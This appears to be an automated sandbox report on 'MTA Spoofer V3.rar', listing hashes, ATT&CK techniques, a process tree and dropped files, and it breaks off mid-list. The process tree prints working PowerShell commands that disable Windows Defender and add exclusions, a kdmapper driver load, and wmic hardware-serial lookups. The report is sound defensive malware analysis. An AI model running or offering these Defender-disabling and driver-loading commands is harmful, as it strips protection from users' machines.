483a69ebf588c7a0a40cb90e4c2b11263e8844fc490cbd3fd3a0191344f72e9a

Analysis

max time kernel
104s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2025, 12:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MTA Spoofer V3.rar
Size

5.8MB
MD5

6f7f87d9b76e4617aed33a93270f7c60
SHA1

aeef909785b303858cdc5f071a592788f078d4e2
SHA256

483a69ebf588c7a0a40cb90e4c2b11263e8844fc490cbd3fd3a0191344f72e9a
SHA512

e43d75e2cb5f8ee259616a79daa9b09fe5bc8bcd5c43851f271b3101cfb3ac427b759191d7e84bf24b05ba1268b9ebb6ac4391ef6eb1cbec54520d82d452b11d
SSDEEP

98304:art8BuzySBkhVgYJlXSYRGa7//0H5Wd0A+RKQzJwKSyUA4O1+vhx/m:arqBuzulIaj0Zk+RdzOyUY10hI

Score

8^/10

discovery execution persistence upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
456	powershell.exe
5968	powershell.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\GOyOfoSpzt\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\GOyOfoSpzt"	kdmapper.exe

Executes dropped EXE 3 IoCs

pid	Process
3924	Spoofer V3.exe
4428	Spoofer V3.exe
112	kdmapper.exe

Loads dropped DLL 17 IoCs

pid	Process
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe
4428	Spoofer V3.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
6068	tasklist.exe

UPX packed file 51 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000024276-35.dat	upx
behavioral1/memory/4428-39-0x00007FFF4CC60000-0x00007FFF4D0C5000-memory.dmp	upx
behavioral1/files/0x0007000000024269-41.dat	upx
behavioral1/memory/4428-44-0x00007FFF5D080000-0x00007FFF5D0A4000-memory.dmp	upx
behavioral1/files/0x0007000000024274-43.dat	upx
behavioral1/files/0x0007000000024273-48.dat	upx
behavioral1/files/0x0007000000024270-62.dat	upx
behavioral1/files/0x000700000002426f-61.dat	upx
behavioral1/files/0x000700000002426e-60.dat	upx
behavioral1/files/0x000700000002426d-59.dat	upx
behavioral1/files/0x000700000002426c-58.dat	upx
behavioral1/files/0x000700000002426b-57.dat	upx
behavioral1/files/0x000700000002426a-56.dat	upx
behavioral1/files/0x0007000000024268-55.dat	upx
behavioral1/files/0x000700000002427b-54.dat	upx
behavioral1/files/0x000700000002427a-53.dat	upx
behavioral1/files/0x0007000000024279-52.dat	upx
behavioral1/files/0x0007000000024275-49.dat	upx
behavioral1/memory/4428-46-0x00007FFF5D580000-0x00007FFF5D58F000-memory.dmp	upx
behavioral1/memory/4428-68-0x00007FFF5D050000-0x00007FFF5D07C000-memory.dmp	upx
behavioral1/memory/4428-70-0x00007FFF5D030000-0x00007FFF5D049000-memory.dmp	upx
behavioral1/memory/4428-72-0x00007FFF5CEE0000-0x00007FFF5CEFE000-memory.dmp	upx
behavioral1/memory/4428-74-0x00007FFF5CD70000-0x00007FFF5CEDD000-memory.dmp	upx
behavioral1/memory/4428-76-0x00007FFF5CD50000-0x00007FFF5CD69000-memory.dmp	upx
behavioral1/memory/4428-78-0x00007FFF5D450000-0x00007FFF5D45D000-memory.dmp	upx
behavioral1/memory/4428-80-0x00007FFF5CD20000-0x00007FFF5CD4E000-memory.dmp	upx
behavioral1/memory/4428-85-0x00007FFF4CBA0000-0x00007FFF4CC57000-memory.dmp	upx
behavioral1/memory/4428-87-0x00007FFF4C820000-0x00007FFF4CB97000-memory.dmp	upx
behavioral1/memory/4428-88-0x00007FFF5D080000-0x00007FFF5D0A4000-memory.dmp	upx
behavioral1/memory/4428-84-0x00007FFF4CC60000-0x00007FFF4D0C5000-memory.dmp	upx
behavioral1/memory/4428-90-0x00007FFF5CD00000-0x00007FFF5CD14000-memory.dmp	upx
behavioral1/memory/4428-93-0x00007FFF5D320000-0x00007FFF5D32D000-memory.dmp	upx
behavioral1/memory/4428-92-0x00007FFF5D050000-0x00007FFF5D07C000-memory.dmp	upx
behavioral1/memory/4428-95-0x00007FFF5D030000-0x00007FFF5D049000-memory.dmp	upx
behavioral1/memory/4428-96-0x00007FFF4C700000-0x00007FFF4C818000-memory.dmp	upx
behavioral1/memory/4428-121-0x00007FFF5CEE0000-0x00007FFF5CEFE000-memory.dmp	upx
behavioral1/memory/4428-137-0x00007FFF4C820000-0x00007FFF4CB97000-memory.dmp	upx
behavioral1/memory/4428-147-0x00007FFF4CBA0000-0x00007FFF4CC57000-memory.dmp	upx
behavioral1/memory/4428-146-0x00007FFF5CD20000-0x00007FFF5CD4E000-memory.dmp	upx
behavioral1/memory/4428-145-0x00007FFF5D450000-0x00007FFF5D45D000-memory.dmp	upx
behavioral1/memory/4428-144-0x00007FFF5CD50000-0x00007FFF5CD69000-memory.dmp	upx
behavioral1/memory/4428-143-0x00007FFF5CD70000-0x00007FFF5CEDD000-memory.dmp	upx
behavioral1/memory/4428-142-0x00007FFF5CEE0000-0x00007FFF5CEFE000-memory.dmp	upx
behavioral1/memory/4428-141-0x00007FFF5D030000-0x00007FFF5D049000-memory.dmp	upx
behavioral1/memory/4428-140-0x00007FFF5D050000-0x00007FFF5D07C000-memory.dmp	upx
behavioral1/memory/4428-139-0x00007FFF5D580000-0x00007FFF5D58F000-memory.dmp	upx
behavioral1/memory/4428-138-0x00007FFF5D080000-0x00007FFF5D0A4000-memory.dmp	upx
behavioral1/memory/4428-136-0x00007FFF4C700000-0x00007FFF4C818000-memory.dmp	upx
behavioral1/memory/4428-135-0x00007FFF5D320000-0x00007FFF5D32D000-memory.dmp	upx
behavioral1/memory/4428-134-0x00007FFF5CD00000-0x00007FFF5CD14000-memory.dmp	upx
behavioral1/memory/4428-122-0x00007FFF4CC60000-0x00007FFF4D0C5000-memory.dmp	upx

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
5968	powershell.exe
5968	powershell.exe
456	powershell.exe
456	powershell.exe
456	powershell.exe
5968	powershell.exe
112	kdmapper.exe
112	kdmapper.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1840	7zFM.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
112	kdmapper.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1840	7zFM.exe
Token: 35	1840	7zFM.exe
Token: SeSecurityPrivilege	1840	7zFM.exe
Token: SeIncreaseQuotaPrivilege	4936	WMIC.exe
Token: SeSecurityPrivilege	4936	WMIC.exe
Token: SeTakeOwnershipPrivilege	4936	WMIC.exe
Token: SeLoadDriverPrivilege	4936	WMIC.exe
Token: SeSystemProfilePrivilege	4936	WMIC.exe
Token: SeSystemtimePrivilege	4936	WMIC.exe
Token: SeProfSingleProcessPrivilege	4936	WMIC.exe
Token: SeIncBasePriorityPrivilege	4936	WMIC.exe
Token: SeCreatePagefilePrivilege	4936	WMIC.exe
Token: SeBackupPrivilege	4936	WMIC.exe
Token: SeRestorePrivilege	4936	WMIC.exe
Token: SeShutdownPrivilege	4936	WMIC.exe
Token: SeDebugPrivilege	4936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4936	WMIC.exe
Token: SeRemoteShutdownPrivilege	4936	WMIC.exe
Token: SeUndockPrivilege	4936	WMIC.exe
Token: SeManageVolumePrivilege	4936	WMIC.exe
Token: 33	4936	WMIC.exe
Token: 34	4936	WMIC.exe
Token: 35	4936	WMIC.exe
Token: 36	4936	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4936	WMIC.exe
Token: SeSecurityPrivilege	4936	WMIC.exe
Token: SeTakeOwnershipPrivilege	4936	WMIC.exe
Token: SeLoadDriverPrivilege	4936	WMIC.exe
Token: SeSystemProfilePrivilege	4936	WMIC.exe
Token: SeSystemtimePrivilege	4936	WMIC.exe
Token: SeProfSingleProcessPrivilege	4936	WMIC.exe
Token: SeIncBasePriorityPrivilege	4936	WMIC.exe
Token: SeCreatePagefilePrivilege	4936	WMIC.exe
Token: SeBackupPrivilege	4936	WMIC.exe
Token: SeRestorePrivilege	4936	WMIC.exe
Token: SeShutdownPrivilege	4936	WMIC.exe
Token: SeDebugPrivilege	4936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4936	WMIC.exe
Token: SeRemoteShutdownPrivilege	4936	WMIC.exe
Token: SeUndockPrivilege	4936	WMIC.exe
Token: SeManageVolumePrivilege	4936	WMIC.exe
Token: 33	4936	WMIC.exe
Token: 34	4936	WMIC.exe
Token: 35	4936	WMIC.exe
Token: 36	4936	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4816	WMIC.exe
Token: SeSecurityPrivilege	4816	WMIC.exe
Token: SeTakeOwnershipPrivilege	4816	WMIC.exe
Token: SeLoadDriverPrivilege	4816	WMIC.exe
Token: SeSystemProfilePrivilege	4816	WMIC.exe
Token: SeSystemtimePrivilege	4816	WMIC.exe
Token: SeProfSingleProcessPrivilege	4816	WMIC.exe
Token: SeIncBasePriorityPrivilege	4816	WMIC.exe
Token: SeCreatePagefilePrivilege	4816	WMIC.exe
Token: SeBackupPrivilege	4816	WMIC.exe
Token: SeRestorePrivilege	4816	WMIC.exe
Token: SeShutdownPrivilege	4816	WMIC.exe
Token: SeDebugPrivilege	4816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4816	WMIC.exe
Token: SeRemoteShutdownPrivilege	4816	WMIC.exe
Token: SeUndockPrivilege	4816	WMIC.exe
Token: SeManageVolumePrivilege	4816	WMIC.exe
Token: 33	4816	WMIC.exe
Token: 34	4816	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1840	7zFM.exe
1840	7zFM.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
112	kdmapper.exe

Suspicious use of WriteProcessMemory 62 IoCs

description	pid	Process	procid_target
PID 4840 wrote to memory of 4940	4840	cmd.exe	97
PID 4840 wrote to memory of 4940	4840	cmd.exe	97
PID 4840 wrote to memory of 4936	4840	cmd.exe	98
PID 4840 wrote to memory of 4936	4840	cmd.exe	98
PID 4840 wrote to memory of 4816	4840	cmd.exe	99
PID 4840 wrote to memory of 4816	4840	cmd.exe	99
PID 4840 wrote to memory of 3188	4840	cmd.exe	100
PID 4840 wrote to memory of 3188	4840	cmd.exe	100
PID 4840 wrote to memory of 3660	4840	cmd.exe	101
PID 4840 wrote to memory of 3660	4840	cmd.exe	101
PID 4840 wrote to memory of 5744	4840	cmd.exe	102
PID 4840 wrote to memory of 5744	4840	cmd.exe	102
PID 4840 wrote to memory of 5108	4840	cmd.exe	103
PID 4840 wrote to memory of 5108	4840	cmd.exe	103
PID 4840 wrote to memory of 3004	4840	cmd.exe	104
PID 4840 wrote to memory of 3004	4840	cmd.exe	104
PID 4840 wrote to memory of 2180	4840	cmd.exe	106
PID 4840 wrote to memory of 2180	4840	cmd.exe	106
PID 4840 wrote to memory of 4668	4840	cmd.exe	107
PID 4840 wrote to memory of 4668	4840	cmd.exe	107
PID 4840 wrote to memory of 5216	4840	cmd.exe	108
PID 4840 wrote to memory of 5216	4840	cmd.exe	108
PID 3924 wrote to memory of 4428	3924	Spoofer V3.exe	114
PID 3924 wrote to memory of 4428	3924	Spoofer V3.exe	114
PID 4428 wrote to memory of 2808	4428	Spoofer V3.exe	115
PID 4428 wrote to memory of 2808	4428	Spoofer V3.exe	115
PID 4428 wrote to memory of 3032	4428	Spoofer V3.exe	116
PID 4428 wrote to memory of 3032	4428	Spoofer V3.exe	116
PID 4428 wrote to memory of 3876	4428	Spoofer V3.exe	119
PID 4428 wrote to memory of 3876	4428	Spoofer V3.exe	119
PID 4428 wrote to memory of 468	4428	Spoofer V3.exe	121
PID 4428 wrote to memory of 468	4428	Spoofer V3.exe	121
PID 3876 wrote to memory of 6068	3876	cmd.exe	123
PID 3876 wrote to memory of 6068	3876	cmd.exe	123
PID 468 wrote to memory of 5996	468	cmd.exe	124
PID 468 wrote to memory of 5996	468	cmd.exe	124
PID 3032 wrote to memory of 456	3032	cmd.exe	125
PID 3032 wrote to memory of 456	3032	cmd.exe	125
PID 2808 wrote to memory of 5968	2808	cmd.exe	126
PID 2808 wrote to memory of 5968	2808	cmd.exe	126
PID 4840 wrote to memory of 3880	4840	cmd.exe	127
PID 4840 wrote to memory of 3880	4840	cmd.exe	127
PID 4840 wrote to memory of 1856	4840	cmd.exe	128
PID 4840 wrote to memory of 1856	4840	cmd.exe	128
PID 4840 wrote to memory of 3100	4840	cmd.exe	129
PID 4840 wrote to memory of 3100	4840	cmd.exe	129
PID 4840 wrote to memory of 5192	4840	cmd.exe	130
PID 4840 wrote to memory of 5192	4840	cmd.exe	130
PID 4840 wrote to memory of 4988	4840	cmd.exe	131
PID 4840 wrote to memory of 4988	4840	cmd.exe	131
PID 4840 wrote to memory of 2680	4840	cmd.exe	132
PID 4840 wrote to memory of 2680	4840	cmd.exe	132
PID 4840 wrote to memory of 1840	4840	cmd.exe	133
PID 4840 wrote to memory of 1840	4840	cmd.exe	133
PID 4840 wrote to memory of 4940	4840	cmd.exe	135
PID 4840 wrote to memory of 4940	4840	cmd.exe	135
PID 4840 wrote to memory of 4936	4840	cmd.exe	136
PID 4840 wrote to memory of 4936	4840	cmd.exe	136
PID 4840 wrote to memory of 3148	4840	cmd.exe	137
PID 4840 wrote to memory of 3148	4840	cmd.exe	137
PID 4840 wrote to memory of 3816	4840	cmd.exe	138
PID 4840 wrote to memory of 3816	4840	cmd.exe	138

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\MTA Spoofer V3.rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Serial Checker.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
  2⤵
  PID:4940
- C:\Windows\System32\Wbem\WMIC.exe
  wmic baseboard get product,Manufacturer,serialnumber
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4936
- C:\Windows\System32\Wbem\WMIC.exe
  wmic bios get manufacturer,serialnumber,version,smbiosbiosversion,releasedate
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4816
- C:\Windows\System32\Wbem\WMIC.exe
  wmic csproduct get name,identifyingnumber,uuid
  2⤵
  PID:3188
- C:\Windows\System32\Wbem\WMIC.exe
  wmic memorychip get partnumber, serialnumber, sku
  2⤵
  PID:3660
- C:\Windows\System32\Wbem\WMIC.exe
  wmic nic get macaddress, description
  2⤵
  PID:5744
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get caption, processorid, socketdesignation, Name, Caption
  2⤵
  PID:5108
- C:\Windows\System32\Wbem\WMIC.exe
  wmic logicaldisk where drivetype=3 get name,volumeserialnumber
  2⤵
  PID:3004
- C:\Windows\System32\Wbem\WMIC.exe
  wmic diskdrive get Model, SerialNumber, name
  2⤵
  PID:2180
- C:\Windows\System32\Wbem\WMIC.exe
  wmic OS GET Caption,SerialNumber,CSName
  2⤵
  PID:4668
- C:\Windows\System32\Wbem\WMIC.exe
  wmic computersystem get PrimaryOwnerName
  2⤵
  PID:5216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
  2⤵
  PID:3880
- C:\Windows\System32\Wbem\WMIC.exe
  wmic baseboard get product,Manufacturer,serialnumber
  2⤵
  PID:1856
- C:\Windows\System32\Wbem\WMIC.exe
  wmic bios get manufacturer,serialnumber,version,smbiosbiosversion,releasedate
  2⤵
  PID:3100
- C:\Windows\System32\Wbem\WMIC.exe
  wmic csproduct get name,identifyingnumber,uuid
  2⤵
  PID:5192
- C:\Windows\System32\Wbem\WMIC.exe
  wmic memorychip get partnumber, serialnumber, sku
  2⤵
  PID:4988
- C:\Windows\System32\Wbem\WMIC.exe
  wmic nic get macaddress, description
  2⤵
  PID:2680
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get caption, processorid, socketdesignation, Name, Caption
  2⤵
  PID:1840
- C:\Windows\System32\Wbem\WMIC.exe
  wmic logicaldisk where drivetype=3 get name,volumeserialnumber
  2⤵
  PID:4940
- C:\Windows\System32\Wbem\WMIC.exe
  wmic diskdrive get Model, SerialNumber, name
  2⤵
  PID:4936
- C:\Windows\System32\Wbem\WMIC.exe
  wmic OS GET Caption,SerialNumber,CSName
  2⤵
  PID:3148
- C:\Windows\System32\Wbem\WMIC.exe
  wmic computersystem get PrimaryOwnerName
  2⤵
  PID:3816

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:668

C:\Users\Admin\Desktop\MTA Spoofer V3\Spoofer V3.exe
"C:\Users\Admin\Desktop\MTA Spoofer V3\Spoofer V3.exe" "C:\Users\Admin\Desktop\MTA Spoofer V3\Spoofer_3.sys"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3924
- C:\Users\Admin\Desktop\MTA Spoofer V3\Spoofer V3.exe
  "C:\Users\Admin\Desktop\MTA Spoofer V3\Spoofer V3.exe" "C:\Users\Admin\Desktop\MTA Spoofer V3\Spoofer_3.sys"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\MTA Spoofer V3\Spoofer V3.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\MTA Spoofer V3\Spoofer V3.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5996

C:\Users\Admin\Desktop\MTA Spoofer V3\kdmapper.exe
"C:\Users\Admin\Desktop\MTA Spoofer V3\kdmapper.exe" "C:\Users\Admin\Desktop\MTA Spoofer V3\Spoofer_3.sys"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of SetWindowsHookEx
PID:112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
029fbf628b046653ab7ff10b31deeeb2

SHA1
93c2cb1905c8f5e71f5ea97a1e8a8c891eae077c

SHA256
85f6b0971e94daf9fd4e39413824f162851a9f5ce7f989bd92c903a4dbcbef26

SHA512
d4e3626dba2572bd1e53446b384962f955cc0c7e56a72cacf50a845d74714ec1020bcb0fdcc50636a1dfd4f08dc34143dbb5638dd90180df6aa31dab9228c98c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\VCRUNTIME140.dll

Filesize
94KB

MD5
a87575e7cf8967e481241f13940ee4f7

SHA1
879098b8a353a39e16c79e6479195d43ce98629e

SHA256
ded5adaa94341e6c62aea03845762591666381dca30eb7c17261dd154121b83e

SHA512
e112f267ae4c9a592d0dd2a19b50187eb13e25f23ded74c2e6ccde458bcdaee99f4e3e0a00baf0e3362167ae7b7fe4f96ecbcd265cc584c1c3a4d1ac316e92f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\_bz2.pyd

Filesize
44KB

MD5
0ac171aba6e08dc61b4c2d69169d9d87

SHA1
bf4521017034e8b0a1eab801ffc2a9f7dd4949f2

SHA256
7997bf38c683b1443b785a0916c434fe70ea09dd137138c16f846aa279641d9b

SHA512
5d749f9005176dca065cfc75e7bc81e4403949542caf08fa94a43cea29da08b9eba2769b8b4f9479763febba773bd8d998a875d3232bc731bc860895ae9cc628

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\_ctypes.pyd

Filesize
54KB

MD5
bb763dfb8a25e3c0e469dec3925f556d

SHA1
2430028aee35c7c46eb738395f03050e201f2351

SHA256
0365a408e68c8743c9e7dec218dc2935c46921eef1938daeb3efcce8f882ecd2

SHA512
bcb759613492090b6edf396a5cffcd65457dbb79db535336ce0446ad9d126af2816dd0cf86c8ba343e5d9f032bfa444516cf7fe315c462d1c22c3509acd803c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\_decimal.pyd

Filesize
102KB

MD5
eed5e0abdd4ef0e278b6031962611c62

SHA1
2c1f1c436ffa230d8a064d8cd379faa345b9e922

SHA256
c647ad464ca1657e9263dc85bf1f814ac441e47555e9a7e080fe5e8aaf7f9ce3

SHA512
93868a3588db03bd1f82d2b12517312bb53fb45ef51a63fa48aa3dfb11ab9fa34805b41434e18c1f4bddc1a9229e016d1b373d9f2923f6b4fa82e334f05f7636

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\_hashlib.pyd

Filesize
31KB

MD5
fee18b1c90fd7dac801a556b06c45bed

SHA1
f32d8c32df6445e4afdebea96d2d4fe403ed2f83

SHA256
624ad5f808c1f73f4c7935e4cd127f12e119ef1e6ff941147abc9c9f98b4a45f

SHA512
f592c87176d71a276c6fe939d87774e21de2f978e2457646e4f78ad09ceed00dba43ebf97398605291b42359f7b3557575b44d2531137c1330c46aa464b3cec4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\_lzma.pyd

Filesize
81KB

MD5
c49ea6c93334203353b030cdd1e15159

SHA1
46284c252a3611a41a1a42b99d1eb929d4dd9b1e

SHA256
9d2d9284ea894e2ed6658b6199c37565aec0dac3e05976139253b531e981c4cb

SHA512
8cdf5e98378bf91a1ceb925096a78990360db12f3fb56361af56d8bc74303311f95f8cff4283b22c6b049d8c808738027e8447e73cf01dcd9e53d25b9c42e0d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\_queue.pyd

Filesize
21KB

MD5
12b7d70195bd2d3bbafb09df34cbab2c

SHA1
a1524d8a62afad87e1f47737386635038b4f64a0

SHA256
332bbfc7b9bdb3eb0231dc0bbae591e7643fe52b01bcaf0e70a443d969d572e2

SHA512
1cc5da688a470d3107ee65dad4ffd0852aed4ae63119ed217425518cf41bd6f3f14b173645d6540ab875db6da289f9bcb5832f7356ac1c3b4b814b52a98c17ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\_socket.pyd

Filesize
38KB

MD5
e1ed9834a361090f081982a46848335d

SHA1
2f0f579f08abb62109c813fa96baeeb2a37affdb

SHA256
6ea35ec2cc5f3e4d31aeb254a4c9edcb837f01e95fbed8eca3a1aedaf73cdaa7

SHA512
afcb2e844ff7e74ea3acbf6949b3a1d949d59ac5ec7cd44ff3ea6390ebca9ddae3cddd43177a4b4218377b37ea2a0eab5b260be627b2ebcd7e88f0ca375a45f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\_sqlite3.pyd

Filesize
45KB

MD5
bf93f4a786faa73ef11986da2ff5a98c

SHA1
dda46f3051e1cafde82cc1c7279362e6c0aa32db

SHA256
7cafa6cd81ab30fb5e73d5209e75436d71fae4f917d8cd281f0f6300a03de3c6

SHA512
8580acb4ef0c8e0e0e041e3301bbc9f11ae8ad474822f78c248848d867d3706925f4d59b2cebf8372e9fc2aa23ef08b8bf971a2dfdfd4905ed6d54038c23aa49

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\_ssl.pyd

Filesize
58KB

MD5
991439c96c0577ea571000fed936a19d

SHA1
0f09781c34f71c1884660941f90e1c6bbfdc9e8e

SHA256
ecd8084e3657450e3497ff343ac4a1e3b974245d47b34f38ee865a21c5f81606

SHA512
2365f4472d0c5147e682a3e448abf4be4a6fd0b21538e7dcd0b762ed0d2fa8cf7451c1427ec1bbc041788cd7cb2eaa40fb07ea6d30b25fbd111023b3cee103c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\base_library.zip

Filesize
858KB

MD5
eac7a8338bde07ed8bf3d0218cf5b46b

SHA1
6527c5748bf5a4c0f9ff6acd22c448ebda9a0b25

SHA256
2d7fe0f6920a48f6ec145b5315a73adeef85aa6455da89ffcb9b34c621778e73

SHA512
693ec6db4fa7ccfe4db8a3b5050ee0111ff7e3238c6eda2f30057a64886b694330a3c24faa511a8169abce3974e516304279f06c4a223e9fc2b2dfd85d62b155

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\blank.aes

Filesize
71KB

MD5
05f42c55134831df97ef0bb15333f8ae

SHA1
20dd69391fa9ee21969be695f00b4c41d7dbbf5f

SHA256
d3f7192732969cc65f7aa6f9f88d72ec5998f97ded75a45e00772e35cc133659

SHA512
fb88ec275b93f15bce1fb99b29c07a1df01261162b366250f17428054b91dfc27d48ec285c0e1040dc564cdb763c8ff9c64e871ab2518ece6669f52c593f82fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\blank.aes

Filesize
71KB

MD5
8b248c8f9961fd154fac4a2c84c2bf0d

SHA1
d1fe2633ffac3247ea59681793aceb70fda5c1dd

SHA256
efd0c9b45c182a854782d4a15e6eb54e4d3aeef97468c8813401b63399a357df

SHA512
091559b40ad35ff663ce75b29a6bfcdcabfd1e9ea765b7319473be0e54c37b736966ffd928f4ecd11739db9008c63f8b4b4d1f1f36cab403cf10a2b85b63cf1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\libcrypto-1_1.dll

Filesize
1.1MB

MD5
cc06c21cb6f68c584ec4a74a795458b0

SHA1
3892bcd66c52cb24d2a08c9c37561aa1b7a01157

SHA256
d3a1c3c349a93d3b78568c705aaea288a11477961658c656790ec4da1bcbd433

SHA512
e045d562af61d2ec8ce71a8ed5dc4040306c46a1f1f687ef832493fa60192c4642cd51aa9c2af25b6123f0249c9e13a5a10243cc31c9aeca28e0299b09468549

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39242\libffi-7.dll

Filesize
